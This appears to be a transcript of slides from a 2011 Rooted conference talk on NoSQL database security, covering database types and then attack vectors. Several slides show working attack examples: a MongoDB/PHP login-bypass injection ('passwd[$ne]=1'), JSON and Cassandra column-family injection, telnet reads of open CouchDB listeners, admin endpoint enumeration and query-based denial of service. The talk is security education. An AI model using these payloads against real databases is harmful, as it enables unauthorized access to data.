Axa Assurance Maroc - Insurer Innovation Award 2024
Rooted 2011 nosql security
1. NoSQL Security
José Ramón Palanco
miércoles 16 de marzo de 2011
2. Agenda
✦ NoSQL Introduction
✦ NoSQL vs RDBMS
✦ NoSQL Arquitecture
✦ NoSQL Implementations
✦ Attack vectors
✦ Injections
✦ Key Bruteforce
✦ HTTP Protocol Based Attacks in listeners
✦ Cassandra security y Thrift security
✦ Denial of Service (connection pollution, evil queries)
miércoles 16 de marzo de 2011
3. NOSQL
Introduction
miércoles 16 de marzo de 2011
4. ¿What is NoSQL?
✦ In general, don’t need table
scheme and don’t uses
“join”
✦ NoSQL solutions don’t
imeplement one or more
ACID properties
miércoles 16 de marzo de 2011
5. CAP Theorem
✦ Properties: consistency,
availability and partitions
✦ At least need 2 of them
✦ To scale partition is needed
✦ In general is preferer availability
over consistency
miércoles 16 de marzo de 2011
6. NoSQL Arquitecture
RDBMS NoSQL
Client Client
HTTP Server HTTP Server
SQL REST, JSON, XML, ...
Connector BBDD Connector BBDD
ODBC, ADO, JDBC Binary, HTTP, ...
miércoles 16 de marzo de 2011
7. NoSQL vs RDBMS
✦ RDBMS show poor performance and
scalability in application which make a heavy
use of data
✦ Cloud Computing (SaaS)
✦ Social Networks (SN)
✦ To make complex queries is not possible
perform them with something diferent than
RDBMS
miércoles 16 de marzo de 2011
8. Enviroments
✦ In lot of enviroments is need to distribute
writes in clusters, MapReduce, ..
✦ Facebook needs store 135 billions of
messages each month
✦ Twitter stores 7 TB diary
miércoles 16 de marzo de 2011
9. Disadvantages NoSQL
✦ OLTP
✦ SQL
✦ Ad-Hoc queries
✦ Complex relations
miércoles 16 de marzo de 2011
10. NoSQL Arquitectures
✦ Document store
✦ Graph
✦ Key-value store
✦ Multivalue
✦ Objets
✦ Tabular
miércoles 16 de marzo de 2011
11. Key-value store
✦ CouchDB:
✦ MongoDB
✦ Terrastore
✦ ThruDB
✦ OrientDB
✦ RavenDB
miércoles 16 de marzo de 2011
12. Graph
✦ Neo4J
✦ Sones
✦ InfoGrid
✦ HypergraphDB
✦ AllegroGraph
✦ BigData
miércoles 16 de marzo de 2011
13. Key-value
✦ Redis
✦ Riak
✦ Tokio Cabinet
✦ MemcacheDB
✦ Membase
✦ Azure
miércoles 16 de marzo de 2011
14. Multivalue
✦ U2
✦ OpenInsight
✦ OpenQM
miércoles 16 de marzo de 2011
15. Objets
✦ db4o ✦ Objetivity
✦ Versant ✦ NEO
miércoles 16 de marzo de 2011
16. MongoDB
✦ Protocol: Binary (BSON)
✦ API: several languages
✦ Query: JavaScript/JSON
✦ Language: C++
miércoles 16 de marzo de 2011
17. • Schema-Free (JSON)
Features
CouchDB
• Document Oriented,
Not Relational
• Highly Concurrent
✦ Protocol: REST
• RESTful HTTP API
✦ API: JSON
• JavaScript-Powered
✦ Map/Reduce
Query: MapReduce (JS)
✦ • Language: Erlang
N-Master Replication
• Robust Storage
miércoles 16 de marzo de 2011
18. {"couchdb":"Welcome","version":"0.11.0"}
$ telnet 172.16.163.129 5984
Trying 172.16.163.129...
Connected to 172.16.163.129.
Escape character is '^]'.
GET /rooted/ HTTP/1.1
Host: localhost
HTTP/1.1 200 OK
Server: CouchDB/0.11.0 (Erlang OTP/R14B)
Date: Sat, 19 Feb 2011 05:20:28 GMT
Content-Type: text/plain;charset=utf-8
Content-Length: 188
Cache-Control: must-revalidate
{"db_name":"rooted","doc_count":1,"doc_del_count":0,"update_seq":1,"purge_seq":
0,"compact_running":false,"disk_size":
4182,"instance_start_time":"1298092462502662","disk_format_version":5}
miércoles 16 de marzo de 2011
19. {"couchdb":"Welcome","version":"0.11.0"}
$ telnet 172.16.163.129 5984
Trying 172.16.163.129...
Connected to 172.16.163.129.
Escape character is '^]'.
GET /rooted/f34aae022f67a23ac56dba5b4e000cf2 HTTP/1.1
Host: localhost
HTTP/1.1 200 OK
Server: CouchDB/0.11.0 (Erlang OTP/R14B)
Etag: "1-2512702fff02fe841adecde4a22c62b5"
Date: Sat, 19 Feb 2011 05:20:47 GMT
Content-Type: text/plain;charset=utf-8
Content-Length: 155
Cache-Control: must-revalidate
{"_id":"f34aae022f67a23ac56dba5b4e000cf2","_rev":"1-2512702fff02fe841adecde4a2
2c62b5","Nombre":"Jose","DNI":"9393948K","telefono":999999999}
Connection closed by foreign host.
miércoles 16 de marzo de 2011
20. Redis
✦ Protocol: Plain Telnet
✦ API: Several Languages
✦ Query: Commands
✦ Language: C/C++
miércoles 16 de marzo de 2011
21. Cassandra
✦ Protocol: Binary (Thrift)
✦ API: Thrift
✦ Query: Column/ranges
✦ Languages: Java
miércoles 16 de marzo de 2011
22. Cassandra
✦ Column (tuple/triplet)
✦ Supercolumn (composed by columns)
✦ Column Family (contains supercolumns)
✦ Keyspace (stores column families)
miércoles 16 de marzo de 2011
23. Cassandra
<Keyspace Name="BloggyAppy">
<!-- CF definitions -->
<ColumnFamily CompareWith="BytesType" Name="Authors"/>
<ColumnFamily CompareWith="BytesType" Name="BlogEntries"/>
<ColumnFamily CompareWith="TimeUUIDType" Name="TaggedPosts"/>
<ColumnFamily CompareWith="TimeUUIDType" Name="Comments"
CompareSubcolumnsWith="BytesType" ColumnType="Super"/>
</Keyspace>
storage-conf.xml
miércoles 16 de marzo de 2011
25. Introduction
✦ Several database concepts
✦ Several implementations
✦ So attack vectors are very
specifics and depends on
each implementation
miércoles 16 de marzo de 2011
26. HTTP Based Attacks
✦ ¿Who uses HTTP?
✦ CouchDB
✦ HBASE
✦ Riak
✦ ¿How to locate
vulnerabilities?
✦ fuzzing: hzzp
miércoles 16 de marzo de 2011
27. Listeners explotation
✦ As they work on $ telnet server.com 80
HTTP, it’s Trying X.X.X.X...
possible use cache Connected to server.com.
proxies Escape character is '^]'
misconfigured to GET /_all_dbs
get access Host: 192.168.2.18
miércoles 16 de marzo de 2011
28. JSON Injection
In the same way that the SQL is
escaped, when working with
CouchDB or MongoDB, we should
do the same
db.foo.find( { $or : [ { a : 1 } , { b : 2 } ] } )
db.foo.find( { $or : [ { a : 1 } , { b : 2 },
{ c : /.*/ } ] } )
miércoles 16 de marzo de 2011
29. Array Injection
<?
$collection->find(array(
MongoDB + PHP "username" => $_GET
['username'],
"passwd" => $_GET
✦ In PHP it is possible that a variable is an array ['passwd']
by adding brackets ));
?>
✦ If admin passwd ‘Not Equal’ anything, you
can access
/login.php?username=admin&passwd[$ne]=1
✦ Besides that of $ne, we can inject:
<?
✦ $or, $exists, $nin, $in, $lt, ... (logics) $collection->find(array(
"username" => "admin",
"passwd" => array("$ne" => 1)
✦ &var[‘$regex’]=/privileged/i (regex) ));
?>
miércoles 16 de marzo de 2011
30. View Injection
✦ CouchDB uses SpiderMonkey as scripting engine
✦ The views are loaded as js
$ ldd /usr/lib/couchdb/bin/couchjs
libcurl.so.4 => /usr/lib/libcurl.so.4 (0x00007f7124325000)
libmozjs.so.2d => /usr/lib/libmozjs.so.2d (0x00007f7124063000)
...
miércoles 16 de marzo de 2011
31. View Injection
✦ There are predefined views
and temporary
✦ To make MapReduce
✦ Get arbitrary data,
change values to alter the
execution flow
miércoles 16 de marzo de 2011
33. CouchDB info
✦ http://172.16.163.129:5984/_config
✦ http://172.16.163.129:5984/_all_dbs
✦ http://172.16.163.129:5984/_stats
✦ http://172.16.163.129:5984/_utils
miércoles 16 de marzo de 2011
35. GQL Injection
✦ You can reach GQL injection, but in a very
controlled environment
✦ There is no negation operator "!"
✦ The set of GQL commands is very limited
miércoles 16 de marzo de 2011
36. Key Bruteforce
✦ As there are no schemes, we do not
have to find out them
✦ The IDs are large, but not
generated at random:
e479f720ff9a05fb2f441fef97000c87
e479f720ff9a05fb2f441fef97000b61
miércoles 16 de marzo de 2011
37. Cassandra Security
<?
...
$columnParent = new cassandra_ColumnParent();
$columnParent->super_column = NULL;
if(isset($_GET[‘CF’]))
$columnParent->column_family = $_GET[‘CF’].“_myfam”;
$sliceRange = new cassandra_SliceRange();
✦ If we change the $sliceRange->start = "";
$sliceRange->finish = "";
name of a family, we $predicate = new cassandra_SlicePredicate();
list() = $predicate->column_names;
can get items from $predicate->slice_range = $sliceRange;
$consistency_level = cassandra_ConsistencyLevel::ONE;
other family $keyUserId = 1;
$result = $client->get_slice($keyspace, $keyUserId,
$columnParent, $predicate, $consistency_level);
print_r($result);
...
?>
miércoles 16 de marzo de 2011
38. Denial of Service
✦ Connection polution
✦ Couchdb-> implementación
interface = restfull
✦ With GQL, it is possible to perform a
DoS creating queries which make an
intensive use of CPU and will be
disconnected or be billed for that
extra CPU
miércoles 16 de marzo de 2011